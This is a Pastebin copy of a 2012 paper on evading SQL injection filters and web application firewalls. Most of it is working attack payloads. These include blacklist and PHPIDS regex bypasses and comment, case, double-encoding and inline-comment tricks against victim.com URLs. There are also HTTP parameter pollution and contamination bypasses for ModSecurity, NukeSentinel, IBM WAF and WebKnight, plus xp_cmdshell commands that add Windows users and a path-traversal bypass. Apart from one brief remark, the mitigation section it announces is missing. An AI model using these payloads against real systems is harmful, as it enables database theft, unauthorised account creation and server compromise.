API tools faq
paste
The_KGB

SQL Filter Evastion

The_KGB
Mar 17th, 2012
395
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 24.07 KB | None | 0 0
raw download clone embed print report
  1. [0x00] - Introduction
  2.  
  3. Welcome readers, this paper is a long attempt at documenting advanced SQL injection we have been working on. This papers will disclose advanced bypassing and obfuscation techniques which many of them can be used in the real CMSs and WAFs. The proposed SQL injection statements in this paper are just some ways to bypass the protection. There are still some other techniques can be used to attacks web applications but unfortunately we cannot tell you right now, as it is kept as a 0-day attack. However, this paper aims to show that there is no completely secure system in the real world even though you spend more than 300,000 USD on a WAF.
  4.  
  5. This paper is divided into 7 sections but only from section 0x01 to 0x03 are about technical information.
  6.  
  7. Section 0x01, we give a details of how to bypass filter including basic, function and keyword. Section 0x02, we offer normally bypassing techniques for bypass OpenSource and Commercial WAF. Section 0x03, we talk in-depth Advanced bypassing techniques that separate into 2 section, "HTTP Parameter Contamination". and "HTTP Pollution: Split and Join". Section 0x04, we guide to protect your own website on the right solution. The last, section 0x05, It's conclusion from Section 0x01-0x04.
  8.  
  9.  
  10. [0x01] - Filter Evasion (Mysql)
  11.  
  12. This section will describe filter evasion behaviors based on PHP and MySQL and how to bypass the filtering. Filter Evasion is a technique used to prevent SQL injection attacks. This technique can be done by using a SQL functions and keywords filtering or regular expressions. This means that filter evasion relies heavily upon how storing a black list or regular expression is. If the black list or regular expression does not cover every injection scenario, the web application is still vulnerable to SQL Injection attacks.
  13.  
  14.  
  15. [0x01a] - Bypass Functions and Keywords Filtering
  16.  
  17. Functions and keywords filtering prevents web applications from being attacked by using a functions and keywords black list. If an attackers submits an injection code containing a keyword or SQL function in the black list, the injection will be unsuccessful. However, if the attacker is able to manipulate the injection by using another keyword or function, the black list will fail to prevent the attack. In order to prevent attacks, a number of keywords and functions has to be put into the black list. However, this affects users when the users want to submit input with a word in the black list. They will be unable to submit the input because it is being filtered by the black list. The following scenarios show cases of using functions and keywords filtering and bypassing techniques.
  18.  
  19. Keyword filer: and, or
  20. ----------------------------------------------------------------------
  21. PHP filter code: preg_match('/(and|or)/i', $id)
  22.  
  23. THe keywords and, or are usually used as a simple test to determine whether a web application is
  24. vulnerable to SQL Injection attacks. Here is a simple bypass using &&, || instead of and, or
  25. respectively.
  26.  
  27. Filtered injection: 1 or 1 = 1 1 and 1 = 1
  28. Bypassed injection: 1 || 1 = 1 1 && 1 = 1
  29. ----------------------------------------------------------------------
  30.  
  31.  
  32. Keyword filer: and, or, union
  33. ----------------------------------------------------------------------
  34. PHP filter code: preg_match('/(and|or|union)/i', $id)
  35.  
  36. The keyword union is generally used to generate an malicious statement in order to select extra
  37. data from the database.
  38.  
  39. Filtered injection: union select user, password from users
  40. Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'
  41.  
  42. ** Remark: you have to know table name, column name and some data in the table, otherwise you have
  43. to get it from information_schema.columns table using other statement
  44. e.g. use substring function to get each character of table names.
  45. ----------------------------------------------------------------------
  46.  
  47.  
  48. Keyword filer: and, or, union, where
  49. ----------------------------------------------------------------------
  50. PHP filter code: preg_match('/(and|or|union|where)/i', $id)
  51. Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
  52. Bypassed injection: 1 || (select user from users limit 1) = 'admin'
  53. ----------------------------------------------------------------------
  54.  
  55.  
  56. Keyword filer: and, or, union, where, limit
  57. ----------------------------------------------------------------------
  58. PHP filter code: preg_match('/(and|or|union|where|limit)/i', $id)
  59. Filtered injection: 1 || (select user from users limit 1) = 'admin'
  60. Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
  61. ----------------------------------------------------------------------
  62.  
  63.  
  64. Keyword filer: and, or, union, where, limit, group by
  65. ----------------------------------------------------------------------
  66. PHP filter code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
  67. Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
  68. Bypassed injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users ) = 1
  69. ----------------------------------------------------------------------
  70.  
  71.  
  72. Keyword filer: and, or, union, where, limit, group by, select
  73. ----------------------------------------------------------------------
  74. PHP filter code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
  75. Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  76. Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
  77. Bypassed injection: 1 || substr(user,1,1) = 'a'
  78. ----------------------------------------------------------------------
  79.  
  80.  
  81. Keyword filer: and, or, union, where, limit, group by, select, '
  82. ----------------------------------------------------------------------
  83. PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
  84. Filtered injection: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
  85. Bypassed injection: 1 || user_id is not null
  86. Bypassed injection: 1 || substr(user,1,1) = 0x61
  87. Bypassed injection: 1 || substr(user,1,1) = unhex(61)
  88. ----------------------------------------------------------------------
  89.  
  90.  
  91. Keyword filer: and, or, union, where, limit, group by, select, ', hex
  92. ----------------------------------------------------------------------
  93. PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
  94. Filtered injection: 1 || substr(user,1,1) = unhex(61)
  95. Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
  96. ----------------------------------------------------------------------
  97.  
  98.  
  99. Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr
  100. ----------------------------------------------------------------------
  101. PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
  102. Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
  103. Bypassed injection: 1 || lpad(user,7,1)
  104. ----------------------------------------------------------------------
  105.  
  106.  
  107. Keyword filer: and, or, union, where, limit, group by, select, ', hex, substr, white space
  108. ----------------------------------------------------------------------
  109. PHP filter code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
  110. Filtered injection: 1 || lpad(user,7,1)
  111. Bypassed injection: 1%0b||%0blpad(user,7,1)
  112. ----------------------------------------------------------------------
  113.  
  114. From the above examples, it can be seen that there are a number of SQL statements used for bypassing the black list although the black list contains many keywords and functions. Furthermore, there are a huge SQL statements, that are not on the mentioned examples, that can be used to bypass the black list.
  115.  
  116. Creating a bigger black list is not a good idea to protect your own websites. Remember, the more keywords and functions filtering, the less user friendly.
  117.  
  118.  
  119. [0x01b] - Bypass Regular Expression Filtering
  120.  
  121. Regular expression filtering is a better solution to prevent SQL injection than keywords and functions filtering because it is used pattern matching to detect attacks. Valid users are allowed to submit more flexible input to the server. However, many regular expression can also be bypassed. The following examples illustrate injection scripts that used to bypass regular expressions in the OpenSource PHPIDS 0.6.
  122.  
  123. PHPIDS generally blocks input containing = or ( or ' following with any a string or integer e.g. 1 or 1=1, 1 or '1', 1 or char(97). However, it can be bypassed using a statement that does not contain =, ( or ' symbols.
  124.  
  125. filtered injection: 1 or 1 = 1
  126. Bypassed injection: 1 or 1
  127.  
  128. filtered injection: 1 union select 1, table_name from information_schema.tables where table_name = 'users'
  129. filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'
  130. filtered injection: 1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)
  131. Bypassed injection: 1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a
  132. Bypassed Injection: 1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273
  133.  
  134.  
  135. [0x02] - Normally Bypassing Techniques
  136.  
  137. In this section, we mention about the techniques to bypass Web Application Firewall (WAF). First thing you need to know what's WAF?
  138.  
  139. A web application firewall (WAF) is an appliance, server plugin, or filter that applies a set of rules to an HTTP conversation. Generally, these rules cover common attacks such as Cross-site Scripting (XSS) and SQL Injection. By customizing the rules to your application, many attacks can be identified and blocked. The effort to perform this customization can be significant and needs to be maintained as the application is modified.
  140.  
  141. WAFs are often called 'Deep Packet Inspection Firewalls' coz they look at every request and response within the HTTP/HTTPS/SOAP/XML-RPC/Web service lacers. Some modern WAF systems work both with attack signatures and abnormal behavior.
  142.  
  143. Now Let's rock to understand How to breach it with obfuscate, All WAFs can be bypassed with the time to understand their rules or using your imagination !!
  144.  
  145.  
  146. 1. Bypass with Comments
  147.  
  148. SQL comments allow us to bypass a lot of filtering and WAFs.
  149.  
  150.  
  151. http://victim.com/news.php?id=1+un/**/ion+se/**/lect+1,2,3--
  152.  
  153.  
  154. 2. Case Changing
  155.  
  156. Some WAFs filter only lowercase SQL keyword.
  157.  
  158. Regex Filter: /union\sselect/g
  159.  
  160.  
  161. http://victim.com/news.php?id=1+UnIoN/**/SeLecT/**/1,2,3--
  162.  
  163.  
  164. 3. Replaced keywords
  165.  
  166. Some application and WAFs use preg_replace to remove all SQL keyword. So we can bypass easily.
  167.  
  168.  
  169. http://victim.com/news.php?id=1+UNunionION+SEselectLECT+1,2,3--
  170.  
  171. Some case SQL keyword was filtered out and replaced with whitespace. So we can use "%0b" to bypass.
  172.  
  173. http://victim.com/news.php?id=1+uni%0bon+se%0blect+1,2,3--
  174.  
  175. Forbidden: http://victim.com/main/news/id/1/**/||/**/lpad(first_name,7,1).html
  176. Bypassed : http://victim.com/main/news/id/1%0b||%0blpad(first_name,7,1).html
  177.  
  178.  
  179. 4. Character encoding
  180.  
  181. Most CMSs and WAFs will decode and filter/bypass an application input, but some WAFs only decode the input once so double encoding can bypass certain filters as the WAF will decode the input once then filter while application keep decoding the SQL statement executing
  182.  
  183. http://victim.com/news.php?id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
  184.  
  185. Moreover, these techniques can combine to bypass Citrix Netscaler
  186.  
  187. - Remove all "NULL" words - Use query encoding in some parts - Remove the single quote character "'" - And Have fun !! Credit: Wendel Guglielmetti Henrique
  188.  
  189. and "Armorlogic Profense" prior to 2.4.4 was bypassed by URL-encoded newline character.
  190.  
  191.  
  192. Real World Example
  193.  
  194. 1. NukeSentinel (Nuke Evolution)
  195.  
  196. Nukesentinel.php Code
  197.  
  198. // Check for UNION attack
  199. // Copyright 2004(c) Raven PHP Scripts
  200. $blocker_row = $blocker_array[1];
  201. if($blocker_row['activate'] > 0) {
  202. if (stristr($nsnst_const['query_string'],'+union+') OR \
  203. stristr($nsnst_const['query_string'],'%20union%20') OR \
  204. stristr($nsnst_const['query_string'],'*/union/*') OR \
  205. stristr($nsnst_const['query_string'],' union ') OR \
  206. stristr($nsnst_const['query_string_base64'],'+union+') OR \
  207. stristr($nsnst_const['query_string_base64'],'%20union%20') OR \
  208. stristr($nsnst_const['query_string_base64'],'*/union/*') OR \
  209. stristr($nsnst_const['query_string_base64'],' union ')) { // block_ip($blocker_row);
  210. die("BLOCK IP 1 " );
  211. }
  212. }
  213.  
  214. We can bypass their filtering with these script:
  215.  
  216. Forbidden: http://victim.com/php-nuke/?/**/union/**/select…..
  217. Bypassed : http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select…
  218. Bypassed : http://victim.com/php-nuke/?%2f**%2funion%2f**%2fselect…
  219.  
  220.  
  221. 2. Mod Security CRS (Credit: Johannes Dahse)
  222.  
  223. SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \ "phase2,rev:'2.2.1',capture,t:none,
  224. t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,
  225. msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',
  226. tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',
  227. setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},
  228. setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
  229.  
  230. We can bypass their filtering with this code:
  231.  
  232. http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
  233.  
  234. From this attack, We can bypass Mod Security rule. Let see what's happen !!
  235.  
  236. MySQL Server supports 3 comment styles:
  237. - From a "#" character to the end of the line
  238. - From a "--" sequence to the end of the line
  239. - From a /* sequence to the following */ sequence, as in the C programming language.
  240. This syntax enables a comment to extend over multiple lines because the beginning and
  241. closing sequences need not be on the same line.
  242.  
  243. The following example, We used "%0D%0A" as the new line characters. Let's take a look at the first request(to extract the DB user)
  244.  
  245. The resulting SQL payload looked something like this:
  246.  
  247. 0 div 1 union#foo*/*/bar
  248. select#foo
  249. 1,2,current_user
  250.  
  251. However the SQL payload, when executed by the MySQL DB, looked something like this:
  252.  
  253. 0 div 1 union select 1,2,current_user
  254.  
  255.  
  256. 5. Buffer Overflow
  257.  
  258. WAFs that written in the C language prone to overflow or act differently when loaded with a bunch of data. Give a large amount of data allows our code executing
  259.  
  260. http://victim.com/news.php?id=1+and+(select 1)=(select 0x414141414141441414141414114141414141414141414141414141414141414141….)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
  261.  
  262.  
  263. 6. Inline Comments (Mysql Only)
  264.  
  265. From MySQL 5.0 Reference Manual, MySQL Server supports some variants of C-style comments. These enable you to write code that includes MySQL extensions, but is still portable, by using comments of the following form:
  266.  
  267. /*! MySQL-specific code */
  268.  
  269. In this case, MySQL Server parses and executes the code within the comment as it would any other SQL statement, but other SQL servers will ignore the extensions.
  270.  
  271. A lot of WAFs filter SQL keywords like /union\sselect\ig We can bypass this filter by using inline comments.
  272.  
  273. http://victim.com/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
  274.  
  275. Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments
  276.  
  277. http://victim.com/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
  278.  
  279.  
  280. [0x03] - Advanced Bypassing Techniques
  281.  
  282. In this section, we offer 2 techniques are "HTTP Pollution: Split and Join" and "HTTP Parameter Contamination". From these techniques can bypass a lot of OpenSource and Commercial Web application firewall (WAF)
  283.  
  284.  
  285. [0x03a] - HTTP Parameter Pollution: Split and Join
  286.  
  287. HTTP Pollution is a new class of injection vulnerability by Luca Carettoni and Stefano Di Paola. HPP is a quite simple but effective hacking technique. HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string.
  288.  
  289. Example of HPP: "http://victim.com/search.aspx?par1=val1&par1=val2"
  290.  
  291. HTTP Parameter Handling: (Example)
  292.  
  293. +------------------------------------------------------------------+
  294. | Web Server | Parameter Interpretation | Example |
  295. +------------------------------------------------------------------+
  296. | ASP.NET/IIS | Concatenation by comma | par1=val1,val2 |
  297. | ASP/IIS | Concatenation by comma | par1=val1,val2 |
  298. | PHP/Apache | The last param is resulting | par1=val2 |
  299. | JSP/Tomcat | The first param is resulting | par1=val1 |
  300. | Perl/Apache | The first param is resulting | par1=val1 |
  301. | DBMan | Concatenation by two tildes | par1=val1~~val2 |
  302. +------------------------------------------------------------------+
  303.  
  304. What would happen with WAFs that do Query String parsing before applying filters ? (HPP can be used even to bypass WAFs)
  305.  
  306. Some loose WAFs may analyze and validate a single parameter occurrence only (first or last one). Whenever the deal environment concatenates multiple occurrences (ASP, ASP.NET, DBMan,…) an aggressor can split the malicious payload. In a recent penetration test (Again), we were able to bypass a Imperva SecureSphere using "HPP+Inline Comment" on ASP/ASP.NET environment.
  307.  
  308. This technique can bypass other Commercial WAFs too. More information about "HPP+Inline Comment" show below:
  309.  
  310.  
  311. Real World Example
  312.  
  313. 1. Mod Security CRS (Credit: Lavakumar Kuppan)
  314.  
  315. The following request matches against the ModSecurity CRS as a SQL Injection attack and is blocked.
  316.  
  317. Forbidden: http://victim.com/search.aspx?q=select name,password from users
  318.  
  319. When the same payload is split against multiple parameters of the same name ModSecurity fails to block it.
  320.  
  321. Bypassed : http://victim.com/search.aspx?q=select name&q=password from users
  322.  
  323. Let's see what's happen, ModSecurity's interpretation is
  324.  
  325. q=select name
  326. q=password from users
  327.  
  328. ASP/ASP.NET's interpretation is
  329.  
  330. q=select name,password from users
  331.  
  332. Tip: This attack can be carried out on a POST variable in a similar way
  333.  
  334.  
  335. 2. Commercial WAFs
  336.  
  337. Forbidden: http://victim.com/search.aspx?q=select name,password from users
  338.  
  339. Now we use HPP+Inline comment to bypass it.
  340.  
  341. Bypassed : http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users
  342.  
  343.  
  344. Analyzing, WAF's interpretation is
  345.  
  346. q=select/*
  347. q=*/name
  348. q=password/*
  349. q=*/from/*
  350. q=*/users
  351.  
  352. ASP/ASP.NET's interpretation is
  353.  
  354. q=select/*,*/name,password/*,*/from/*,*/users
  355. q=select name,password from users
  356.  
  357.  
  358. 3. IBM Web Application Firewall (Credit: Wendel Guglielmetti Henrique of Trustwave's SpiderLabs)
  359.  
  360. Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT /add” --
  361.  
  362. Now we use HPP+Inline comment to bypass it.
  363.  
  364. Bypassed : http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ --
  365.  
  366. Analyzing, WAF's interpretation is
  367.  
  368. id=1’; /*
  369. id=1*/ EXEC /*
  370. id=1*/ master..xp_cmdshell /*
  371. id=1*/ “net user zeq3ul UrWaFisShiT” /*
  372. id=1*/ --
  373.  
  374. ASP/ASP.NET's interpretation is
  375.  
  376. id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user zeq3ul UrWaFisShiT” /*,1*/ --
  377. id=1’; EXEC master..xp_cmdshell “net user zeq3ul UrWaFisShiT” --
  378.  
  379.  
  380. The easiest mitigation to this attack would be for the WAF to disallow multiple instances of the same parameter in a single HTTP request. This would prevent all variations of this attack.
  381.  
  382. However this might not be possible in all cases as some applications might have a legitimate need for multiple duplicate parameters. And they might be designed to send and accept multiple HTTP parameters of the same name in the same request.To protect these applications the WAF should also interpret the HTTP request in the same way the web application would.
  383.  
  384.  
  385. [0x03b] - HTTP Parameter Contamination
  386.  
  387. HTTP Parameter Contamination (HPC) original idea comes from the innovative approach found in HPP research by exploring deeper and exploiting strange behaviors in Web Server components, Web Applications and Browsers as a result of query string parameter contamination with reserved or non expects characters.
  388.  
  389. Some facts: - The term Query String is commonly used to refer to the part between the "?" and the end of the URI - As defined in the RFC 3986, it is a series of field-value pairs - Pairs are separated by "&" or ";" - RFC 2396 defines two classes of characters: Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' () Reserved : ; / ? : @ & = + $ , Unwise : { } | \ ^ [ ] `
  390.  
  391. Different web servers have different logic for processing special created requests. There are more web server, backend platform and special character combinations, but we will stop here this time.
  392.  
  393. Query string and Web server response (Example)
  394.  
  395. +-----------------------------------------------------------+
  396. | Query String | Web Servers response / GET values |
  397. +-----------------------------------------------------------+
  398. | | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP |
  399. +-----------------------------------------------------------+
  400. | ?test[1=2 | test_1=2 | test[1=2 |
  401. | ?test=% | test=% | test= |
  402. | ?test%00=1 | test=1 | test=1 |
  403. | ?test=1%001 | NULL | test=1 |
  404. | ?test+d=1+2 | test_d=1 2 | test d=1 2 |
  405. +-----------------------------------------------------------+
  406.  
  407. Magic character "%" affect to ASP/ASP.NET
  408.  
  409. +--------------------------------------------------------------------+
  410. | Keywords | WAF | ASP/ASP.NET |
  411. +--------------------------------------------------------------------+
  412. | sele%ct * fr%om.. | sele%ct * fr%om.. | select * from.. |
  413. | ;dr%op ta%ble xxx | ;dr%op ta%ble xxx | ;drop table xxx |
  414. | <scr%ipt> | <scr%ipt> | <script> |
  415. | <if%rame> | <if%rame> | <iframe> |
  416. +--------------------------------------------------------------------+
  417.  
  418.  
  419. Real world examples:
  420.  
  421. 1. Bypass Mod_Security SQL Injection rule (modsecurity_crs_41_sql_injection_attacks.conf)
  422.  
  423. [Sun Jun 12 12:30:16 2011] [error] [client 192.168.2.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\bsys\\.user_objects\\b"
  424. at ARGS_NAMES:sys.user_objects. [file "/etc/apache2/conf.d/crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "110"] [id "959519"]
  425. [rev "2.2.0"] [msg "Blind SQL Injection Attack"] [data "sys.user_objects"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"]
  426. [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "localhost"] [uri "/"] [unique_id "TfT3gH8AAQEAAAPyLQQAAAAA"]
  427.  
  428. Forbidden: http://localhost/?xp_cmdshell
  429. Bypassed : http://localhost/?xp[cmdshell
  430.  
  431. 2. Bypass URLScan 3.1 DenyQueryStringSequences rule
  432.  
  433. Forbidden: http://localhost/test.asp?file=../bla.txt
  434. Bypassed : http://localhost/test.asp?file=.%./bla.txt
  435.  
  436. 3. Bypass AQTRONIX Webknight (WAF for IIS and ASP/ASP.Net
  437.  
  438. Forbidden: http://victim.com/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
  439. Bypassed : http://victim.com/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
  440.  
  441. From this situation, Webknight use SQL keywords filtering when we use "HTTP contamination" by insert "%" into SQL keywords WAF is bypassed and sending these command to Web server: "id=10 and 1=0/(select top 1 table_name from information_schema.tables)" because "%" is cutter in web server.
  442.  
  443. These types of hacking techniques are always interesting because they reveal new perspectives on security problems. Many applications are found to be vulnerable to this kind of abuse because there are no defined rules for strange web server behaviors. HPC can be used to extend HPP attack with spoofing real parameter name in the QUERY_STRING with "%" character on an IIS/ASP platform, if there is WAF who blocks this kind of an attack.
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!